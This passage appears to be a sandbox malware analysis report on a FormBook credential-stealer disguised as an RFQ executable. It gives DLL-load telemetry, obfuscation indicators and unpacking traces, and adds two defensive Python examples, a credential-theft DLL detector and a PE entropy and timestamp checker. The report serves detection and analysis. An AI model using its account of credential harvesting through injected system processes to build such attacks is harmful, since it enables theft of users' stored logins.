              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Sections loaded: cryptsp.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll, urlmon.dll, srvcli.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll
              Source: C:\Windows\SysWOW64\runonce.exe Sections loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: rasadhlp.dllJump to behavior
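The section-loaded rows above are the most actionable telemetry in this part of the report: runonce.exe, a Windows system binary from SysWOW64, loads winsqlite3.dll, vaultcli.dll and dpapi.dll, the exact DLL set needed to read browser login databases, the Windows Credential Manager vault and DPAPI-protected blobs. A legitimate runonce.exe has no reason to touch any of them, so this is the credential-harvesting stage of the FormBook payload running inside an injected host process (the same process whose memory later carries the .NET mainscreen.cs code). The following Python is an added detection example, not part of the Joe Sandbox report or its detection engine: it parses constructed Sysmon Event ID 7 (ImageLoad) records modelled on the rows above and flags any process outside a browser allowlist that loads two or more of those DLLs, marking hosts under C:\Windows separately because a system binary doing this almost always means injection. The DLL set, the threshold, the allowlist and the log format are assumptions for the example.

```python
import ntpath
from collections import defaultdict

# DLLs whose combined presence in one process is the working signature of
# credential theft: Windows Vault (vaultcli), browser login databases
# (winsqlite3) and DPAPI unprotect (dpapi). This set, the threshold and the
# allowlist below are assumptions for the example, not Joe Sandbox's rule.
CREDENTIAL_ACCESS_DLLS = {"vaultcli.dll", "winsqlite3.dll", "dpapi.dll"}
EXPECTED_LOADERS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}

# Constructed Sysmon Event ID 7 (ImageLoad) records, modelled on the
# "Section loaded" rows above. Not real telemetry from this analysis.
SAMPLE_LOG = """\
Image: C:\\Windows\\SysWOW64\\runonce.exe|ImageLoaded: C:\\Windows\\SysWOW64\\wininet.dll
Image: C:\\Windows\\SysWOW64\\runonce.exe|ImageLoaded: C:\\Windows\\SysWOW64\\winsqlite3.dll
Image: C:\\Windows\\SysWOW64\\runonce.exe|ImageLoaded: C:\\Windows\\SysWOW64\\vaultcli.dll
Image: C:\\Windows\\SysWOW64\\runonce.exe|ImageLoaded: C:\\Windows\\SysWOW64\\dpapi.dll
Image: C:\\Users\\user\\AppData\\Local\\Temp\\xl9lsbb.exe|ImageLoaded: C:\\Windows\\SysWOW64\\cryptbase.dll
Image: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|ImageLoaded: C:\\Windows\\System32\\dpapi.dll
Image: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|ImageLoaded: C:\\Windows\\System32\\winsqlite3.dll
"""


def parse_image_loads(text: str):
    """Yield (process image path, lowercase DLL basename) from
    'Image: ...|ImageLoaded: ...' lines; malformed lines are skipped."""
    for line in text.splitlines():
        fields = dict(part.split(": ", 1) for part in line.split("|") if ": " in part)
        if "Image" in fields and "ImageLoaded" in fields:
            yield fields["Image"], ntpath.basename(fields["ImageLoaded"]).lower()


def find_credential_access(events, min_hits: int = 2) -> dict:
    """Return {image: {"dlls": [...], "windows_binary": bool}} for every process
    outside the allowlist that loaded at least min_hits credential-access DLLs.
    windows_binary marks hosts under C:\\Windows, the injection/hollowing signal:
    a system binary such as runonce.exe has no business with these DLLs."""
    loaded = defaultdict(set)
    for image, dll in events:
        if dll in CREDENTIAL_ACCESS_DLLS:
            loaded[image].add(dll)
    hits = {}
    for image, dlls in loaded.items():
        if ntpath.basename(image).lower() in EXPECTED_LOADERS or len(dlls) < min_hits:
            continue
        hits[image] = {
            "dlls": sorted(dlls),
            "windows_binary": image.lower().startswith("c:\\windows\\"),
        }
    return hits


if __name__ == "__main__":
    for image, verdict in find_credential_access(parse_image_loads(SAMPLE_LOG)).items():
        tag = " (Windows system binary)" if verdict["windows_binary"] else ""
        print(f"{image}: loaded {', '.join(verdict['dlls'])}{tag}")
```

On the constructed input only runonce.exe is reported; chrome.exe loads the same two DLLs but is an expected loader, and xl9lsbb.exe only touches cryptbase.dll. In production the allowlist should be keyed on signer and path rather than basename, since basename allowlists are trivially spoofed.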
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static file information: File size 1173504 > 1048576
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: WeSe.pdb source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: WeSe.pdbSHA256F source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4101090653.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4102484254.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4101091867.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000000.3711234727.000000000055E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: runonce.pdbGCTL source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3647970854.00000000041C0000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3649509708.000000000437F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4104187209.0000000004530000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: runonce.pdb source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4106518555.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.0000000003362000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003D8DC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: RFQ - MK FMHS.RFQ.24.101.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: VT3g2PdlLRVpwBp[1].exe.3.dr, mainscreen.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: xl9lsbb.exe.3.dr, mainscreen.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.cs | .Net Code: VMHmfuKEXf System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.cs | .Net Code: VMHmfuKEXf System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.6ef0000.4.raw.unpack, -Module-.cs | .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.6ef0000.4.raw.unpack, PingPong.cs | .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.2aac2e8.1.raw.unpack, -Module-.cs | .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.2aac2e8.1.raw.unpack, PingPong.cs | .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.cs | .Net Code: VMHmfuKEXf System.Reflection.Assembly.Load(byte[])
              Source: 15.2.runonce.exe.4bfcd08.2.raw.unpack, mainscreen.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.0.bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe.354cd08.1.raw.unpack, mainscreen.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.2.bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe.354cd08.1.raw.unpack, mainscreen.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 17.2.firefox.exe.2decd08.0.raw.unpack, mainscreen.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: VT3g2PdlLRVpwBp[1].exe.3.dr | Static PE information: 0xF5A03AEA [Mon Aug 2 19:39:22 2100 UTC]
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00EEC304 LoadLibraryA,GetProcAddress, 0_2_00EEC304
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00ED8719 push FFFFFF8Bh; iretd 0_2_00ED871B
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E9E94F push edi; ret 0_2_00E9E951
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E9EA68 push esi; ret 0_2_00E9EA6A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E98B85 push ecx; ret 0_2_00E98B98
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E9EC43 push esi; ret 0_2_00E9EC45
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe | Code function: 0_2_00E9ED2C push edi; ret 0_2_00E9ED2E
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025013D0 pushad ; retn E4ABh 1_2_025014A6
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025163CC push ebx; iretd 1_2_0251643F
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02503390 push eax; ret 1_2_02503392
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02501BAC pushad ; ret 1_2_02501C26
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0250A85A push cs; iretd 1_2_0250A85B
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02511888 push ecx; ret 1_2_02511891
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02503106 push es; iretd 1_2_02503107
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025231A3 push esi; retf 1_2_025231AE
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0250A6E8 pushfd ; iretd 1_2_0250A702
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02505775 push edx; iretd 1_2_02505744
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025187D5 pushfd ; ret 1_2_025187DA
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02513C1B push es; retf 1_2_02513C22
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02501C2D pushad ; ret 1_2_02501C26
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02517C99 push esp; iretd 1_2_02517CA6
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025145A1 push es; iretd 1_2_025145AA
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F0225F pushad ; ret 1_2_02F027F9
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F027FA pushad ; ret 1_2_02F027F9
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F0283D push eax; iretd 1_2_02F02858
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx 1_2_02F309B6
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F01368 push eax; iretd 1_2_02F01369
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_039D225F pushad ; ret 3_2_039D27F9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_039D27FA pushad ; ret 3_2_039D27F9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_03A009AD push ecx; mov dword ptr [esp], ecx 3_2_03A009B6
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_039D283D push eax; iretd 3_2_039D2858
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_039D1368 push eax; iretd 3_2_039D1369
              Source: VT3g2PdlLRVpwBp[1].exe.3.dr | Static PE information: section name: .text entropy: 7.9778904613954715
              Source: xl9lsbb.exe.3.dr | Static PE information: section name: .text entropy: 7.9778904613954715
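Two of the static findings above on the dropped VT3g2PdlLRVpwBp[1].exe / xl9lsbb.exe stage carry most of the triage weight: a COFF TimeDateStamp of 0xF5A03AEA, which decodes to 2 August 2100, and a .text section entropy of 7.98 out of a possible 8.0, which is what a packed or encrypted payload looks like and matches the Assembly.Load(byte[]) unpacking seen in the .NET code rows. The following Python is an added example, not code from the report or from the Joe Sandbox engine: it walks a PE far enough to read the COFF timestamp and each section's raw bytes, computes Shannon entropy per section, and flags timestamps that lie in the future or before Windows NT existed. It builds a constructed one-section PE32 fixture in-line so it runs offline. The 7.0 entropy threshold and the 1993 floor are assumptions for the example; note also that deterministic (reproducible) builds store a hash rather than a time in this field, so a strange timestamp is a triage hint, not proof on its own.

```python
import math
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
PACKED_THRESHOLD = 7.0   # assumption for this example, not a Joe Sandbox setting


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes.
    Packed or encrypted sections sit near 8, like the 7.98 reported for .text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table and
    return the COFF TimeDateStamp plus (name, entropy) for every section."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", data, coff)
    sect_table = coff + 20 + opt_size        # section headers follow the optional header
    sections = []
    for i in range(nsections):
        (name, _vsize, _va, raw_size, raw_ptr, _prel, _plin, _nrel, _nlin,
         _sc) = struct.unpack_from("<8sIIIIIIHHI", data, sect_table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         shannon_entropy(raw)))
    return {"machine": machine, "timestamp": timestamp, "sections": sections}


def timestamp_to_utc(ts: int) -> datetime:
    # timedelta arithmetic instead of fromtimestamp(): works past 2038 on every
    # platform, which the year-2100 stamp above needs.
    return EPOCH + timedelta(seconds=ts)


def timestamp_is_suspicious(ts: int, now: datetime) -> bool:
    """Future stamps, or stamps before Windows NT shipped (1993), deserve a look.
    Caveat: deterministic/reproducible builds store a hash here rather than a
    time, so this is a triage hint, not proof of tampering."""
    when = timestamp_to_utc(ts)
    return when > now or when.year < 1993


def build_minimal_pe(timestamp: int, text: bytes) -> bytes:
    """Constructed fixture: a one-section PE32 image, not a real sample."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)        # PE32 magic, rest zero
    raw_ptr = 0x40 + 4 + 20 + 0xE0 + 40                       # first byte after the headers
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text),
                       raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + sect + text


def triage(data: bytes, now: datetime) -> dict:
    """Static triage verdicts in the spirit of the two report rows above."""
    info = parse_pe(data)
    info["timestamp_utc"] = timestamp_to_utc(info["timestamp"]).isoformat()
    info["timestamp_suspicious"] = timestamp_is_suspicious(info["timestamp"], now)
    info["packed_sections"] = [n for n, e in info["sections"] if e > PACKED_THRESHOLD]
    return info


if __name__ == "__main__":
    import os
    sample = build_minimal_pe(0xF5A03AEA, os.urandom(4096))
    print(triage(sample, datetime.now(timezone.utc)))
```

Run against a real dropped file, replace build_minimal_pe with the file's bytes; for .NET assemblies the whole managed image lives in .text, so a near-8.0 .text entropy there means the IL itself is encrypted and the real code only appears after the in-memory Assembly.Load, which is why the report's memory dumps (the .raw.unpack sources) are where the readable class names turn up.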
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, JIXbT6WQgGNnNM192M.cs | High entropy of concatenated method names: 'GayUXXqcJi', 'PUtUlFP24n', 'C1vUbtSfBS', 'OkuUNHZCcy', 'BuvUVaWevv', 'SkVb03bbWX', 'flBb9T6CYn', 'zNibd7pOid', 'Vd1b7fPV1D', 'EFIbDfgiVG'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, FbDRsRoUK8rESGYi11.cs | High entropy of concatenated method names: 'n8qltgPJJK', 'uWdlgq4XxP', 'r6fljRlI1c', 'Kndlar4eND', 'Dt9l0MuuL9', 'eFDl9fBZnw', 'rqFldKdQuB', 'kxrl71Srq6', 'E6olDRjAkA', 'nQplwvMUtE'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.cs | High entropy of concatenated method names: 'fwKBXY20al', 'XP1BP4xbvW', 'GbSBlSUTCF', 'BAbBCVOmFd', 'IItBbxGowe', 'DvtBUvxxZp', 'IHbBNwu1p9', 'ogkBV73kCq', 'qJXBA1pLsC', 'oHsBTXwnDm'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, ck40obiVbH6brFYghT.cs | High entropy of concatenated method names: 'fQhNPu9lSR', 'sTKNCnA60u', 'a0fNUPahob', 'biXUwVpcnj', 'WktUzWCm18', 'JVINke4OXc', 'hm1NrLc0Q2', 'byxN62rDoZ', 'PHjNBtKuGD', 'KHsNmUcJEv'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, YBRuf3m6wC97koaAEA.cs | High entropy of concatenated method names: 'F6yrNbDRsR', 'jK8rVrESGY', 'FiirTSHLu6', 'tdLrOXhM0c', 'Jq3rMS4hIX', 'iT6r4QgGNn', 'WcxnZseU0FuY4JPl12', 'vTTeWwMAlnrDIsisfD', 'HlmrraPIZB', 'EnTrBHduir'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, TdDFQhDXWh6Q9Q2LqO.cs | High entropy of concatenated method names: 'QLwHWZbTtb', 'abuHEFEB2w', 'DblHLaZFb2', 'KhYHpaG3s5', 'YmNHtOf5bt', 'Ok1Hh6uFk0', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, EJ3B2yqiiSHLu61dLX.cs | High entropy of concatenated method names: 'yxyCSR0Qsb', 'MPgC2pYkRH', 'vSsCoUglRF', 'lHHCq00SSL', 'uiGCMBy43U', 'EriC4tWKnA', 'mpXCxF0uKD', 'mNlCH6K58k', 'KQgCvmDYnZ', 'Vq3C8jwnsp'
